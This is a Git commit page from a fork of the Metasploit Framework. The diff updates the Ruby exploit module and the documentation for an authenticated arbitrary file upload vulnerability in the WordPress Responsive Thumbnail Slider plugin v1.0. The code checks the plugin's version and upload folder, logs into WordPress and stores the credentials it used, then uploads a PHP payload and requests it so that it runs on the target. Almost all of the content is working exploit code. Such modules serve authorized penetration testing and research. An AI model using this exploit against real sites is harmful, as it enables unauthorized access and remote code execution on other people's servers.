dnrops
/
metasploit-framework
1
0
Fork 0
Code Issues Pull Requests Packages Projects Releases Wiki Activity

Update module and its documentation

This commit is contained in:
Wei Chen 2018-07-26 23:08:20 -05:00
parent be1bf8b1fc
commit 72d634b10b
2 changed files with 59 additions and 55 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

7
documentation/modules/exploit/multi/http/wp_responsive_thumbnail_slider_upload.md
View File

@ -1,13 +1,16 @@
## Vulnerable Application
This module exploits an arbitrary file upload vulnerability in Responsive Thumbnail Slider Plugin v1.0 for WordPress post authentication.
This module exploits an arbitrary file upload vulnerability in Responsive Thumbnail Slider Plugin
v1.0 for WordPress post authentication.
For testing purposes, you may download a vulnerable version [here](https://www.exploit-db.com/apps/f5d34e16d07e61ad6826d2c1f3d16089-wp-responsive-thumbnail-slider.zip).
## Verification Steps
1. Install the application
2. Start msfconsole
3. Do: ```use [exploit/multi/http/wp_responsive_thumbnail_slider_upload]```
3. Do: ```use exploit/multi/http/wp_responsive_thumbnail_slider_upload```
4. Do: ```set RHOSTS [IP]```
5. Do: ```set TARGETURI [URI]```
6. Do: ```set USERNAME [USERNAME]```

107
modules/exploits/multi/http/wp_responsive_thumbnail_slider_upload.rb
View File

@ -4,21 +4,24 @@
##
class MetasploitModule < Msf::Exploit::Remote
Rank = NormalRanking
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::Remote::HTTP::Wordpress
include Msf::Exploit::PhpEXE
def initialize(info={})
super(update_info(info,
'Name' => "WordPress Responsive Thumbnail Slider Arbitrary File Upload",
'Description' => %q{
This module exploits an arbitrary file upload vulnerability in Responsive Thumbnail Slider Plugin v1.0 for WordPress post authentication.
This module exploits an arbitrary file upload vulnerability in Responsive Thumbnail Slider
Plugin v1.0 for WordPress post authentication.
},
'License' => MSF_LICENSE,
'Author' => [ 'Arash Khazaei', # EDB PoC
'Shelby Pace' # Metasploit Module
],
'Author' =>
[
'Arash Khazaei', # EDB PoC
'Shelby Pace' # Metasploit Module
],
'References' =>
[
[ 'EDB', '37998' ]
@ -29,10 +32,6 @@ class MetasploitModule < Msf::Exploit::Remote
[
[ 'Responsive Thumbnail Slider Plugin v1.0', { } ]
],
'Payload' =>
{
'BadChars' => "\x00"
},
'Privileged' => false,
'DisclosureDate' => "Aug 28 2015",
'DefaultTarget' => 0))
@ -40,12 +39,42 @@ class MetasploitModule < Msf::Exploit::Remote
register_options(
[
OptString.new('TARGETURI', [ true, "Base path for WordPress", '/' ]),
OptString.new('USERNAME', [ true, "Username to authenticate with", 'admin' ]),
OptString.new('PASSWORD', [ true, "Password to authenticate with", '' ])
OptString.new('WPUSERNAME', [ true, "WordPress Username to authenticate with", 'admin' ]),
OptString.new('WPPASSWORD', [ true, "WordPress Password to authenticate with", '' ])
])
end
def check
# The version regex found in extract_and_check_version does not work for this plugin's
# readme.txt, so we build a custom one.
check_code = check_version || check_plugin_path
if check_code
return check_code
else
return CheckCode::Safe
end
end
def check_version
plugin_uri = normalize_uri(target_uri.path, '/wp-content/plugins/wp-responsive-thumbnail-slider/readme.txt')
res = send_request_cgi(
'method' => 'GET',
'uri' => plugin_uri
)
if res && res.body && res.body =~ /Version:([\d\.]+)/
version = Gem::Version.new($1)
if version <= Gem::Version.new('1.0')
vprint_status("Plugin version found: #{version}")
return CheckCode::Appears
end
end
nil
end
def check_plugin_path
plugin_uri = normalize_uri(target_uri.path, '/wp-content/uploads/wp-responsive-images-thumbnail-slider/')
res = send_request_cgi(
@ -53,51 +82,22 @@ class MetasploitModule < Msf::Exploit::Remote
'uri' => plugin_uri
)
unless res && res.code == 200
return Exploit::CheckCode::Safe
if res && res.code == 200
vprint_status('Upload folder for wp-responsive-images-thumbnail-slider detected')
return CheckCode::Detected
end
Exploit::CheckCode::Detected
nil
end
def login
wp_uri = normalize_uri(target_uri.path, 'wp-login.php')
res = send_request_cgi(
'method' => 'GET',
'uri' => wp_uri
)
auth_cookies = wordpress_login(datastore['WPUSERNAME'], datastore['WPPASSWORD'])
return fail_with(Failure::NoAccess, "Unable to log into WordPress") unless auth_cookies
if res && res.body.include?("WordPress") && res.code == 200
print_status("WordPress accessed")
else
fail_with(Failure::NotFound, "Failed to access WordPress Login Page")
end
store_valid_credential(user: datastore['WPUSERNAME'], private: datastore['WPPASSWORD'], proof: auth_cookies)
redirect_uri = normalize_uri(target_uri.path, 'wp-admin/')
cookies = res.get_cookies
wp_login_res = send_request_cgi(
'method' => 'POST',
'uri' => wp_uri,
'cookie' => cookies,
'vars_post' => {
'log' => datastore['USERNAME'],
'pwd' => datastore['PASSWORD'],
'wp-submit' => 'Log In',
'redirect_to' => redirect_uri
}
)
auth_cookies = wp_login_res.get_cookies
auth_res = send_request_cgi(
'method' => 'GET',
'uri' => redirect_uri,
'cookie' => auth_cookies
)
return fail_with(Failure::NoAccess, "Unable to log into WordPress") unless auth_res && auth_res.body.include?("wpadminbar")
print_good("Logged into WordPress")
upload_payload(auth_cookies)
print_good("Logged into WordPress with #{datastore['WPUSERNAME']}:#{datastore['WPPASSWORD']}")
auth_cookies
end
def upload_payload(cookies)
@ -143,7 +143,7 @@ class MetasploitModule < Msf::Exploit::Remote
file_uri = normalize_uri(target_uri.path, "wp-content/uploads/wp-responsive-images-thumbnail-slider/#{fname}")
print_good("Successful upload")
execute = send_request_raw(
send_request_cgi(
'uri' => file_uri,
'method' => 'GET',
'cookie' => cookies
@ -151,8 +151,9 @@ class MetasploitModule < Msf::Exploit::Remote
end
def exploit
unless check == Exploit::CheckCode::Safe
login
unless check == CheckCode::Safe
auth_cookies = login
upload_payload(auth_cookies)
end
end
end